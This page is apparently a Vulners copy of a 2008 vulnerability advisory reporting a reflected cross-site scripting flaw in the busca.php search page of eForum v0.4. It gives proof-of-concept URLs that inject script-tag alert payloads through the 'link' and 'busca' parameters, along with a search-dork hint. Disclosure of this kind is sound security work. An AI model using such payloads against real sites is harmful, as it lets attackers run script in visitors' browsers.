Lucene search
K

eforum-xss.txt

🗓️ 19 Mar 2008 00:00:00Reported by OmnipresentType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

eForum v0.4 - Non-Persistent XSS, Input Sanitization Vulnerabilit

Code
` eForum v0.4 - NON-PERSISTENT XSS  
by Omni  
  
1) Infos  
---------  
Date : 2008-03-05  
Product : eForum  
Version : v 0.4  
Vendor : http://www.phpbrasil.com/scripts/script.php/id/169  
Vendor Status :  
2008-03-18 Not Informed!  
2008-03-18 Published!  
  
  
Description :   
eForum is an easy-to-install discussion board that doesn't require any database. Features include admin area to delete  
topics with session authentication, a search system (more stable this version), configurable layout using css file.  
Moderator can be notified of new posts on the forum. It has threaded view. Ubbcode-style supported. Multiple languages  
supported: Portuguese, English, German and Danish. UPDATE 0.4: post preview, better ubbcode support, better javascript,  
other small changes, some bugs fixed, italian and turkish translations.  
  
Dork : Powered by .. could be used.  
Source : omnipresent - omni - http://omni.playhack.org  
  
E-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net  
  
  
2) Security Issues  
-------------------  
  
  
--- [ NON-PERSISTENT XSS ] ---  
===============================================  
  
Input passed to "busca" and "link" parameters in busca.php are not properly sanitized before being returned to the   
user's browser.  
  
This can be exploited to execute arbitrary HTML/script code.  
  
--- [ PoC ] ---  
===============  
  
http://localhost/eForum/busca.php  
use the input box and search what you want. (js)  
  
http://localhost/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E&busca=%3Cscript%3Ealert(2)%3C/script%3E  
  
http://localhost/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E  
  
  
--- [ Patch ] ---  
===============  
- Edit the source code.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation